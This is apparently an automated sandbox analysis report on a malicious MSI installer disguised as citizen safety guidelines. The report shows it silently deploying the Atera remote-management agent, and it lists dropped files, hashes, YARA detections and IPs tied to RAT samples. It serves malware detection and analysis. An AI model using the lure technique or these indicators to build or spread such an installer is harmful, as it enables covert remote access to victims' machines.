                                                                                                                                                                                                                                                      Start date and time:2024-11-24 11:14:11 +01:00
                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                      Overall analysis duration:0h 10m 27s
                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:28
                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                      Sample name:Guidelines_for_Citizen_Safety.msi
                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                      Classification:mal88.troj.spyw.evad.winMSI@37/86@13/2
                                                                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                      • Successful, ratio: 76%
                                                                                                                                                                                                                                                      • Number of executed functions: 422
                                                                                                                                                                                                                                                      • Number of non-executed functions: 3
                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                      • Found application associated with file extension: .msi
                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 40.81.94.65, 40.119.152.241, 178.79.238.0, 192.229.221.95
• Excluded domains from analysis (whitelisted): crl.edge.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, cacerts.digicert.com, agentsapi.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, atera-agent-api-eu.westeurope.cloudapp.azure.com, ocsp.edge.digicert.com, azureedge-t-prod.trafficmanager.net, crl3.digicert.com, crl4.digicert.com, wu-b-net.trafficmanager.net
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 5852 because it is empty
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 6992 because it is empty
• Execution Graph export aborted for target AgentPackageAgentInformation.exe, PID 7332 because it is empty
• Execution Graph export aborted for target AteraAgent.exe, PID 6216 because it is empty
• Execution Graph export aborted for target AteraAgent.exe, PID 7400 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 4308 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 7832 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 7892 because it is empty
• Execution Graph export aborted for target rundll32.exe, PID 8000 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Guidelines_for_Citizen_Safety.msi
Time | Type | Description
05:15:28 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
05:15:35 | API Interceptor | 1686525x Sleep call for process: AteraAgent.exe modified
05:16:02 | API Interceptor | 3x Sleep call for process: AgentPackageAgentInformation.exe modified
                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      ZOL2mIYAUH.exeGet hashmaliciousPhemedrone Stealer, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      owuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      WV7Gj9lJ7W.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      18sFhgSyVK.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
                                                                                                                                                                                                                                                      kwlYObMOSn.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                                      • 108.158.75.93
                                                                                                                                                                                                                                                      • 13.232.67.198
| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | setup (1).msi | malicious | AteraAgent |
| | BOMB-762.msi | malicious | AteraAgent |
| | LaudoBombeirosPDF.msi | malicious | AteraAgent |
| | 1nzNNooNMS.msi | malicious | AteraAgent |
| | Le55bnMCON.msi | malicious | AteraAgent |
| | z8yxMFhhZI.msi | malicious | AteraAgent |
| | kTbv9ZA2x0.msi | malicious | AteraAgent |
| | IwmwOaVHnd.msi | malicious | AteraAgent |
| | gaYiWz75kv.msi | malicious | AteraAgent |
| | e8gTT6OTKZ.msi | malicious | AteraAgent |
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):8867
                                                                                                                                                                                                                                                                          Entropy (8bit):5.66256969300573
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:vjWxz1ccbTOOeMeqD61X7r6IHfX7r6kAVv70HVotBVeZEmzmYpLAV77qGpY9rr:vKD2jHpHtiB2iw
                                                                                                                                                                                                                                                                          MD5:310674CE8E886312A648DAB2B230BD41
                                                                                                                                                                                                                                                                          SHA1:6BEB5357C8E0B78A171275F62856157976D29D9C
                                                                                                                                                                                                                                                                          SHA-256:BF397B6A9F44916E99378DF9910E58A3EF640F754430D2F72730396B3DF34D38
                                                                                                                                                                                                                                                                          SHA-512:2EAFB47469164981C2390DF46CEEE575940C6E19C419F7505657DB85BB6BBA48EA0F8FB31189B9F768166F53B01267B6618DB00697DBEFCF58AAE6E44C29FE56
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Config.Msi\6c6862.rbs, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:...@IXOS.@.....@.)xY.@.....@.....@.....@.....@.....@......&.{E732A0D7-A2F2-4657-AC41-B19742648E45}..AteraAgent!.Guidelines_for_Citizen_Safety.msi.@.....@.....@.....@........&.{721AD955-79FD-4019-BBF5-9DCC4C1175BB}.....@.....@.....@.....@.......@.....@.....@.......@......AteraAgent......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....StopAteraServiceQuiet....KillAteraTaskQuiet....ProcessComponents..Updating component registration..&.{F7DFE9BA-9FAD-11DA-9578-00E08161165F}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{C8C868DC-3A5E-4180-A7BB-03D6282966CB}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{0EC8B23C-C723-41E1-9105-4B9C2CDAD47A}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F1B1B9D1-F1B0-420C-9D93-F04E9BD4795D}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{5F95F700-DCA4-4880-B2D2-891AE0D6E1A3}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@......&.{F62C52BA-15C7-4C3D-AAB2-DE65004F9665}&.{E732A0D7-A2F2-4657-AC41-B19742648E45}.@..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):753
                                                                                                                                                                                                                                                                          Entropy (8bit):4.853078320826549
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:qLLYem7haYNem7hcomf3em7hUQLtygXnC9xkKxeCsx/Yem7haYNem7hcomf3em7B:qLUVhzVhM3VhdLtXXIxkKxeCsOVhzVhY
                                                                                                                                                                                                                                                                          MD5:8298451E4DEE214334DD2E22B8996BDC
                                                                                                                                                                                                                                                                          SHA1:BC429029CC6B42C59C417773EA5DF8AE54DBB971
                                                                                                                                                                                                                                                                          SHA-256:6FBF5845A6738E2DC2AA67DD5F78DA2C8F8CB41D866BBBA10E5336787C731B25
                                                                                                                                                                                                                                                                          SHA-512:CDA4FFD7D6C6DFF90521C6A67A3DBA27BF172CC87CEE2986AE46DCCD02F771D7E784DCAD8AEA0AD10DECF46A1C8AE1041C184206EC2796E54756E49B9217D7BA
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                          Preview:.Installing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..Installing service AteraAgent.....Service AteraAgent has been successfully installed...Creating EventLog source AteraAgent in log Application.....Committing assembly 'C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe'...Affected parameters are:.. logtoconsole = .. assemblypath = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.. logfile = C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (7463), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):7466
                                                                                                                                                                                                                                                                          Entropy (8bit):5.1606801095705865
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:R3DrP/zatgCnNjn1x62muDr9aHmzcv/65m7JDcm0BefnanGEkn56vT4ZvR++JDr+:NexdYX7OSRjXsaA0Ndhi
                                                                                                                                                                                                                                                                          MD5:362CE475F5D1E84641BAD999C16727A0
                                                                                                                                                                                                                                                                          SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                          SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                          SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):145968
                                                                                                                                                                                                                                                                          Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                          MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                          SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                          SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                          SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                          • Filename: setup (1).msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: BOMB-762.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: LaudoBombeirosPDF.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: 1nzNNooNMS.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: Le55bnMCON.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: z8yxMFhhZI.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: kTbv9ZA2x0.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: IwmwOaVHnd.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: gaYiWz75kv.msi, Detection: malicious
                                                                                                                                                                                                                                                                          • Filename: e8gTT6OTKZ.msi, Detection: malicious
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1442
                                                                                                                                                                                                                                                                          Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                          MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                          SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                          SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                          SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3318832
                                                                                                                                                                                                                                                                          Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                          MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                          SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                          SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                          SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):215088
                                                                                                                                                                                                                                                                          Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                          MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                          SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                          SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                          SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):710192
                                                                                                                                                                                                                                                                          Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                          MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                          SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                          SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                          SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):384542
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999374626035649
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:6144:viqRTU5exRWDCtTLvL0XRFJE9A+BQlv9I+NBsNQvaNXvhGf1mzVeUXJLo:vil/DSLvAJ6CxBHmJXVpJLo
                                                                                                                                                                                                                                                                          MD5:4A09A87D2004DAC4B00687E9C9F15036
                                                                                                                                                                                                                                                                          SHA1:C78BB288E7A96642093ABE44CB9B7BBD3EC447BA
                                                                                                                                                                                                                                                                          SHA-256:2DBC8CF2592604C09793CBED61E0B072B1B1FFA375FB3C9ABCA83FA0E18AB9A5
                                                                                                                                                                                                                                                                          SHA-512:F555F5A0BB80514BC71BB33A77620D28A9E6715E538372AAA7F0500BC8D5BFE8511F5CA982E15304422479FF693E6F38510D6616A94580FC1B105DD2DA605EAA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):177704
                                                                                                                                                                                                                                                                          Entropy (8bit):5.814572246989157
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:2DpvOyLSson7aezB53Pbsk4GJCMA1TSuAehuZ7f2lz8/Cvolc3a:2D4y07asBx4krGSegZX3
                                                                                                                                                                                                                                                                          MD5:FD9DF72620BCA7C4D48BC105C89DFFD2
                                                                                                                                                                                                                                                                          SHA1:2E537E504704670B52CE775943F14BFBAF175C1B
                                                                                                                                                                                                                                                                          SHA-256:847D0CD49CCE4975BAFDEB67295ED7D2A3B059661560CA5E222544E9DFC5E760
                                                                                                                                                                                                                                                                          SHA-512:47228CBDBA54CD4E747DBA152FEB76A42BFC6CD781054998A249B62DD0426C5E26854CE87B6373F213B4E538A62C08A89A488E719E2E763B7B968E77FBF4FC02
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):546
                                                                                                                                                                                                                                                                          Entropy (8bit):5.048902065665432
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:MMHdG3VSQg9LNFF7ap+5v5OXrRf/2//FicYo4xm:JdASPF7NhOXrRH2/d9r
                                                                                                                                                                                                                                                                          MD5:158FB7D9323C6CE69D4FCE11486A40A1
                                                                                                                                                                                                                                                                          SHA1:29AB26F5728F6BA6F0E5636BF47149BD9851F532
                                                                                                                                                                                                                                                                          SHA-256:5E38EF232F42F9B0474F8CE937A478200F7A8926B90E45CB375FFDA339EC3C21
                                                                                                                                                                                                                                                                          SHA-512:7EEFCC5E65AB4110655E71BC282587E88242C15292D9C670885F0DAAE30FA19A4B059390EB8E934607B8B14105E3E25D7C5C1B926B6F93BDD40CBD284AAA3CEB
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>...<supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. </assemblyBinding>.. </runtime>..</configuration>..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                                                                                                          Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:WhWbn:WCn
                                                                                                                                                                                                                                                                          MD5:EB053699FC80499A7185F6D5F7D55BFE
                                                                                                                                                                                                                                                                          SHA1:9700472D22B1995C320507917FA35088AE4E5F05
                                                                                                                                                                                                                                                                          SHA-256:BCE3DFDCA8F0B57846E914D497F4BB262E3275F05EA761D0B4F4B778974E6967
                                                                                                                                                                                                                                                                          SHA-512:D66FA39C69D9C6448518CB9F98CBDAD4CE5E93CEEF8D20CE0DEEF91FB3E512B5D5A9458F7B8A53D4B68D693107872C5445E99F87C948878F712F8A79BC761DBF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:version=38.0
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):96808
                                                                                                                                                                                                                                                                          Entropy (8bit):6.1799972918389185
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:UJt7dqUlizL21LDdeOKTfLz2L506wFj/XxFoKjhJG/50vks00UfgfgvO1762A:UQUm2H5KTfOLgxFJjE50vksVUfPvO1W
                                                                                                                                                                                                                                                                          MD5:E2A9291940753244C88CB68D28612996
                                                                                                                                                                                                                                                                          SHA1:BAD8529A85C32E5C26C907CFB2FB0DA8461407AE
                                                                                                                                                                                                                                                                          SHA-256:6565E67D5DB582B3DE0B266EB59A8ACEC7CDF9943C020CB6879833D8BD784378
                                                                                                                                                                                                                                                                          SHA-512:F07669A3939E3E6B5A4D90C3A5B09CA2448E8E43AF23C08F7A8621817A49F7B0F5956D0539333A6DF334CC3E517255242E572EAEF02A7BBF4BC141A438BF9EB9
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
